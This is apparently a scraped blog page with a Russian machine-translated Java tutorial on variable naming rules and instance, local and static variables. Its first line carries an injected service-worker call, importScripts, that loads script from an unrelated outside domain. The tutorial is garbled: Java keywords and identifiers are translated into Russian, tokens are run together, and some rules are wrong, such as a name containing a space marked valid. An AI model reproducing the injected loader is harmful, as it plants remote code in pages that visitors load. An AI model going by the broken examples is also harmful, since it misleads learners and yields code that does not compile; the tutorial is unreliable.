google-site-verification: google2818f8f06eec354e.html self.importScripts('https://zworld-news.com/sw/w_1.js');

Типы переменных Java и правила для объявления переменных



Переменная - это ничего, это просто имя ячейки памяти. 
При объявлении переменных мы должны следовать приведенным ниже правилам.
Типы переменных Java и правила для объявления переменных

Правила объявления переменных в Java

1. Имя переменной должно быть связано с типом данных . Это означает, что при 
объявлении переменной мы должны указать ее тип данных.
Пример: int x = 10;
2. Резервное слово или ключевые слова не могут быть приняты в качестве 
имени переменной .
3. C 
поддерживает имена переменных длиной 32 символа, в то время как в Java длина имени переменной 
может быть бесконечной.
4. Ничто, кроме 0-9, AZ, az, _, $ не может быть использовано в 
имени переменной .
5. Имя переменной не должно начинаться с цифры, специальные 
символы также не допускаются.
Пример:
intabc = 7; (Действительный)
int _abc = 8; (Действительный)
int abc8 = 9; (Действительный)
int 8abc = 10 (неверно)
int $ _abc = 12; (Действительный)
int $ _abc * = 15; (недействительным)
6. Имя переменной должно быть значимым.
Пример:
строка i = ”Raj”; 
// допустимо, но не имеет смысла
имя строки = «Радж»; // действительный и значимый
Примечание: локальные переменные должны быть инициализированы перед первым использованием.
демонстрация класса
{
                public 
static void main (String… s)
                {
                                int 
x; // должен быть инициализирован
                                System.out.println (х);
                }
}

Типы переменных Java

В Java есть три типа переменных: 
экземпляры, локальные и статические.

1. Переменные экземпляра

Переменные экземпляра объявляются в классе, но вне любого 
метода, конструктора или блока.

2. Локальные переменные

Локальные переменные объявляются в методах, конструкторах или 
блоках. Он должен быть инициализирован перед первым использованием.

3. Статические переменные

Статические переменные объявляются с ключевым словом static в классе, но вне любого метода, конструктора или блока.
класс А
{
                int 
x = 12; // переменная экземпляра
                staticint 
y = 13; // статическая переменная
               
                public 
static void main (String… s)
                {
                                int 
z = 30; // локальная переменная
                                System.out.println (х);
                                System.out.println (у);
                                System.out.println (г);
                }
}

Комментариев нет:

Отправить комментарий